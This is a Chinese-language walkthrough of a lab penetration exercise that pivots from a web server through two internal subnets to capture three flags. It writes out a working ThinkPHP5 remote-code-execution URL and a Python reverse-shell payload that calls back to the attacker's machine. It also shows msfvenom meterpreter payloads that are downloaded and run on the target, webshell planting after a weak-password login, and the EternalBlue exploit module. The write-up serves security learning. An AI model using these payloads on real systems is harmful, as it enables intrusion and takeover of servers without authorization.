從web到內(nèi)網(wǎng)滲透的一次過(guò)程詳解
記一次從web到內(nèi)網(wǎng)的滲透
拓?fù)鋱D
環(huán)境介紹
現(xiàn)在有三臺(tái)機(jī)器,分別為target1,target2,target3,里面分別有三個(gè)flag,每個(gè)flag的分值不同,需要通過(guò)拿下一個(gè)已知IP(target1)進(jìn)而向內(nèi)網(wǎng)里面進(jìn)行滲透,最終要成功獲得三臺(tái)主機(jī)權(quán)限
滲透過(guò)程
target1
使用nmap進(jìn)行掃描
可以看到開(kāi)啟了80端口
瀏覽器訪(fǎng)問(wèn)目標(biāo)靶機(jī)80端口
可以看到就是apache的默認(rèn)頁(yè)面
使用dirb進(jìn)行目錄結(jié)構(gòu)掃描
發(fā)現(xiàn)public
頁(yè)面
可以看到是thinkphp5搭建的網(wǎng)站,thinkphp5曾經(jīng)爆過(guò)一個(gè)遠(yuǎn)程代碼執(zhí)行的漏洞,直接上網(wǎng)站尋找payload驗(yàn)證是否存在漏洞
http://192.168.109.181/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
可以看到確實(shí)存在漏洞,現(xiàn)在可以向網(wǎng)站里面寫(xiě)入一句話(huà)木馬,然后用蟻劍去連接,這是一種方法,但是也可以直接去嘗試反彈一個(gè)shell到kali上
kali上執(zhí)行:nc -lvvp 4444 瀏覽器中執(zhí)行:http://192.168.109.181/public/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.109.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);
可以看到kali這邊成功反彈到了一個(gè)shell
使用python生成一個(gè)交互式的shell
查找一下flag
成功獲得第一個(gè)flag
使用msfvenom生成一個(gè)反向的shellcode
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.109.128 lport=5555 -f elf > msf.elf
使用python開(kāi)啟一個(gè)臨時(shí)http服務(wù)
靶機(jī)下載該shellcode
然后kali打開(kāi)msf,進(jìn)行監(jiān)聽(tīng)
use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set lport 5555 set lhost 192.168.109.128 exploit
然后靶機(jī)上給予shellcode執(zhí)行的權(quán)限后執(zhí)行該文件
可以看到kali這邊成功返回一個(gè)meterpreter
查看一下網(wǎng)絡(luò)配置
可以看到target1還存在一個(gè)網(wǎng)段
添加路由表
配置socks代理
use auxiliary/server/socks_proxy exploit
配置proxychains代理鏈
vim /etc/proxychains4.conf
target2
掃描10.1.1.0/24這個(gè)網(wǎng)段是否還存在其他機(jī)器
use auxiliary/scanner/portscan/tcp set rhosts 10.1.1.0/24 set ports 1-1000 set threads 50 exploit
可以看到該網(wǎng)段還存在一臺(tái)機(jī)器為10.1.1.150
使用nmap掃描10.1.1.150開(kāi)放端口
proxychains4 nmap -Pn -sT 10.1.1.150
可以看到也開(kāi)放了80端口
這里直接用瀏覽器去訪(fǎng)問(wèn)10.1.1.150的80端口顯然是不行的,不過(guò)火狐瀏覽器也是支持socks代理的
再次訪(fǎng)問(wèn)網(wǎng)站
查看robots.txt
文件
找到后臺(tái)登入位置
直接使用弱密碼admin:admin
登入成功
成功獲得第二個(gè)flag,找到模板位置,發(fā)現(xiàn)里面的源碼都是可以編輯的
寫(xiě)入一句話(huà)木馬
然后使用蟻劍去連接,當(dāng)然直接去連接肯定也是不行的,不過(guò)蟻劍也是支持代理設(shè)置的
之后再正常去連接就行了,但是我這里不知道是環(huán)境問(wèn)題還是蟻劍的問(wèn)題,正常來(lái)說(shuō)這里是肯定能連接成功的,我試了很多遍都沒(méi)有成功,然后想著直接把那個(gè)頁(yè)面里面的源碼直接換為大馬,也是不行的,因?yàn)橐话愦篑R都是經(jīng)過(guò)作者編譯過(guò)了,直接復(fù)制過(guò)去肯定會(huì)有問(wèn)題,最后只能直接將大馬事先準(zhǔn)備在了網(wǎng)站根目錄下面,這里主要是為了體現(xiàn)內(nèi)網(wǎng)滲透,所以這里也不細(xì)說(shuō)
訪(fǎng)問(wèn)大馬
使用msfvenom生成一個(gè)正向連接的shellcode
msfvenom -p windows/meterpreter/bind_tcp lport=6666 -f exe -o 1.exe
然后通過(guò)大馬將shellcode上傳到目標(biāo)服務(wù)器
然后再次進(jìn)入之前打開(kāi)的msf
然后在大馬上執(zhí)行上傳的shellcode
可以看到kali這邊成功返回了一個(gè)meterpreter
查看網(wǎng)絡(luò)配置
可以看到還有一個(gè)網(wǎng)段10.1.2.0/24
將路由添加到路由表
run post/multi/manage/autoroute
taget3
掃描10.1.2.0/24網(wǎng)段是否還存在其他機(jī)器
use auxiliary/scanner/portscan/tcp set rhosts 10.1.2.0/24 set ports 1-1000 set threads 100 exploit
這里掃描實(shí)在太慢,這個(gè)網(wǎng)段還有一個(gè)機(jī)器IP為10.1.2.250
然后再添加一層socks代理
use auxiliary/server/socks_proxy set srvport 2222 exploit
配置proxychains代理鏈
vim /etc/proxychains4.conf
使用nmap進(jìn)行端口掃描
proxychains4 nmap -Pn -sT 10.1.2.250
根據(jù)掃描結(jié)果判斷操作系統(tǒng)為windows
再使用nmap的漏掃腳本進(jìn)行掃描
proxychains4 nmap --script=vuln 10.1.2.250
可以看到存在ms17-010,直接上msf尋找攻擊模塊
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set rhost 10.1.2.250 exploit
查找一下flag
三臺(tái)主機(jī)的權(quán)限全部那先,所有flag查找完畢,至此,滲透結(jié)束
以上就是從web到內(nèi)網(wǎng)滲透的一次過(guò)程詳解的詳細(xì)內(nèi)容,更多關(guān)于web到內(nèi)網(wǎng)滲透過(guò)程的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章!
相關(guān)文章
Git安裝詳細(xì)圖文教程(Git?安裝過(guò)程的每一個(gè)步驟)
這篇文章主要介紹了Git安裝詳細(xì)圖文教程(Git?安裝過(guò)程的每一個(gè)步驟),本文以Git-2.35.1.2-64-bit.exe為例給大家講解安裝過(guò)程,需要的朋友可以參考下2023-02-02Web 設(shè)計(jì)與開(kāi)發(fā)者必須知道的 15 個(gè)站點(diǎn)
今天讀到一篇文章,介紹了15個(gè)對(duì) Web 設(shè)計(jì)與開(kāi)發(fā)師極端有用的站點(diǎn),里面有不少也是我們一直在使用的,也許對(duì)很多人都有用,翻譯出來(lái)以餉同仁。2009-08-08IDEA一鍵啟動(dòng)多個(gè)微服務(wù)操作步驟
在開(kāi)發(fā)多個(gè)微服務(wù)的項(xiàng)目時(shí),逐個(gè)啟動(dòng)服務(wù)較為繁瑣,通過(guò)IDEA的Compound功能,可以實(shí)現(xiàn)一鍵啟動(dòng)多個(gè)服務(wù),本文詳細(xì)介紹了如何通過(guò)編輯配置來(lái)添加微服務(wù)群組,文中通過(guò)圖文介紹的非常詳細(xì),需要的朋友可以參考下2024-09-09